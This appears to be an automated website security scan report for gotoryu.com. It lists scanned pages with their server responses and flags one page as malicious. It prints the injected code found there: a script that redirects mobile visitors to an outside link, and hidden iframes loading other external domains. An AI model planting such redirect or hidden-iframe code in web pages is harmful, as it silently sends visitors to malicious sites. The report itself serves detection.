Scanned pages/files
Request | Server response | Status |
http://gotoryu.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Mar 2015 05:25:00 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: HIT X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php X-Varnish: 1272118669 1272118668 | clean |
http://www.gotoryu.com/ | 200 OK Content-Length: 10165 Content-Type: text/html | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.easing.js | 200 OK Content-Length: 8101 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.jscrollpane.js | 200 OK Content-Length: 24971 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/main.js | 200 OK Content-Length: 9695 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.tools.min.js | 200 OK Content-Length: 6139 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/cufon.js | 200 OK Content-Length: 18257 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/mgopen.js | 200 OK Content-Length: 23911 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.fullscreenr.js | 200 OK Content-Length: 1542 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/fancybox/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14731 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/plugins/flv-embed/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/innerfade.js | 200 OK Content-Length: 4924 Content-Type: application/javascript | clean |
http://gotoryu.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 21 Mar 2015 05:25:08 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/test404page.js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: MISS X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php X-Varnish: 1272118689 | clean |
http://www.gotoryu.com/test404page.js | 404 Not Found Content-Length: 10198 Content-Type: text/html | clean |
http://www.gotoryu.com/ch | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Mar 2015 05:25:09 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/ch/ Server: nginx/1.6.2 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS X-Varnish: 1272118691 | clean |
http://www.gotoryu.com/ch/ | 200 OK Content-Length: 33548 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://go.unilead.net/SH20k"; }
Decoded script:
<div style="position: absolute;left: 0;bottom: 100%;"><iframe src="http://bimis.ml/?1" width="150" height="450"></iframe></div>
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://turginya.ru/?1625
<iframe src="http://turginya.ru/?1625" width="0" height="0" align="left">
http://www.gotoryu.com/ch/wp-content/themes/gotoryu/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gotoryu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Mar 2015 05:25:00 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.gotoryu.com/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: HIT
X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php
X-Varnish: 1272118669 1272118668
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gotoryu.com
Referer: http://www.google.com/search?q=gotoryu.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gotoryu.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gotoryu.com/
Result: gotoryu.com is not infected or malware details are not published yet.